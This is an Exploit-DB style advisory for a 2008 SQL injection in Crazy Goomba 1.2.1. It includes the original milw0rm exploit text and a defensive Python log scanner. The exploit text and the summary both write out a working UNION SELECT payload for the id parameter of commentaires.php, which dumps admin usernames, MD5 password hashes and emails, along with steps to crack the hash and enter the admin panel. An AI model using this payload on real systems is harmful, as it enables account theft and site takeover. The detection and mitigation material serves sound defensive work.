Vendor: Crazy Goomba
By: ZoRLu
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Crazy Goomba
Affected Version From: 1.2.2001
Affected Version To: 1.2.2001
Patch Exists: NO
Related CWE: N/A
CPE: a:z0rlu:crazy_goomba
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Crazy Goomba 1.2.1 SQL inj

An attacker can exploit a SQL injection vulnerability in Crazy Goomba 1.2.1 to gain access to the admin panel. Supplying the following payload as the id parameter of commentaires.php (the [SQL] placeholder in the advisory) returns the admin's username, MD5 password hash and email address from the cg_joueurs table: 1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**. The attacker can then use the obtained credentials to log in to the admin panel at http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
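As an added example (not the advisory's or the Crazy Goomba project's code), the following Python shows the defender's side of the id parameter described above: it undoes the two obfuscations the payload relies on (URL encoding and /**/ comments used in place of spaces), flags a UNION SELECT on any id value that is not a plain integer, which is the input validation the mitigation refers to, and runs that check over constructed log lines. The log lines, IP addresses and the scan_log/normalize function names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed web-server log lines (not real traffic): line 1 carries the advisory's
# payload against commentaires.php?id=, line 2 is a benign request, line 3 is the same
# kind of UNION SELECT with the quote and comment characters URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [21/Apr/2008:10:00:00 +0000] "GET /Crazy_Goomba_1.2.1_path/commentaires.php?id=1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/** HTTP/1.1" 200 4321
10.0.0.6 - - [21/Apr/2008:10:00:01 +0000] "GET /Crazy_Goomba_1.2.1_path/commentaires.php?id=42 HTTP/1.1" 200 1234
10.0.0.7 - - [21/Apr/2008:10:00:02 +0000] "GET /Crazy_Goomba_1.2.1_path/commentaires.php?id=1%27%2F%2A%2A%2FUNION%2F%2A%2A%2FSELECT%2F%2A%2A%2F1,2,3,4,5,6,7 HTTP/1.1" 200 4321
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')
UNION_RE = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.IGNORECASE)
# Inline comments used as whitespace; also eats a trailing unterminated "/**".
COMMENT_RE = re.compile(r"/\*.*?(?:\*/|$)")


def normalize(value: str) -> str:
    """URL-decode once more (parse_qs already decoded once, so double-encoded
    variants are caught too) and replace every /*...*/ comment with a space."""
    return COMMENT_RE.sub(" ", unquote_plus(value))


def is_union_injection(value: str) -> bool:
    """True when the normalized value contains a UNION [ALL] SELECT clause."""
    return bool(UNION_RE.search(normalize(value)))


def scan_log(log_text: str, param: str = "id"):
    """Return (client_ip, raw_value) for requests whose `param` is not a plain
    integer (the check the application should enforce) and carries a UNION SELECT."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = parse_qs(urlsplit(match.group(1)).query, keep_blank_values=True)
        for value in query.get(param, []):
            if not value.isdigit() and is_union_injection(value):
                hits.append((line.split()[0], value))
    return hits


if __name__ == "__main__":
    for ip, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: UNION SELECT in id={normalize(value).strip()}")
```

The same isdigit() test, applied server-side before the value reaches the query, is the simplest form of the input validation the mitigation calls for; parameterized queries remain the general fix.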
Source

Exploit-DB raw data:

##########CANAKKALE GECiLMEZ##############################

Crazy Goomba 1.2.1 SQL inj

dork: :(( sorry

author: ZoRLu 

home: ( http://www.z0rlu.ownspace.org ) ( yildirimordulari.org ) ( r00tsecurity.org ) ( securityfocus.com )

contact: trt-turk@hotmail.com & ZoRLu@w.cn ( no other MSN, beware of imitations )

Note: whoever adds my MSN and talks rudely, the whole world [curses] their family .... I am not giving out my MSN so you can try to plant a keylogger on me. Stop talking nonsense :((

Note: http://www.z0rlu.ownspace.org   information on using the vulnerabilities is available on my blog! what can you do, no money, we opened it for free :))

###################CANAKKALE GECiLMEZ###################

http://localhost/Crazy_Goomba_1.2.1_path/commentaires.php?id=[SQL]


[SQL]


1'/**/union/**/select/**/0,pseudo,password,email,id,0,0/**/from/**/cg_joueurs/**



( write the code in place of [SQL] and obtain the admin name, password (md5) and email address )

crack the md5 and log in

http://localhost/Crazy_Goomba_1.2.1_path/index.php?page=connexion  ( login )


then connect to the admin panel


admin panel: 


http://localhost/Crazy_Goomba_1.2.1_path/administration/admin.php



###################CANAKKALE GECiLMEZ####################

thanx: str0ke, FaLCaTa, aRKi, the_KaM!L, ReD_KaN, iSoMiX, edish, harded, z3h!r, KoDLoK, Dr.SaLTuK, kasIrga(lavrens), w3R3m

avkidis, head_hunter and all users yildirimordulari.org & r00tsecurity.org

He Is a Commando Now: iSoMiX ( You are my dear brother, my best buddy :))  )

Legend: YILDIRIMORDULARI.ORG

Classes have started, the virtual life is over  :(((

###################CANAKKALE GECiLMEZ####################

# milw0rm.com [2008-04-21]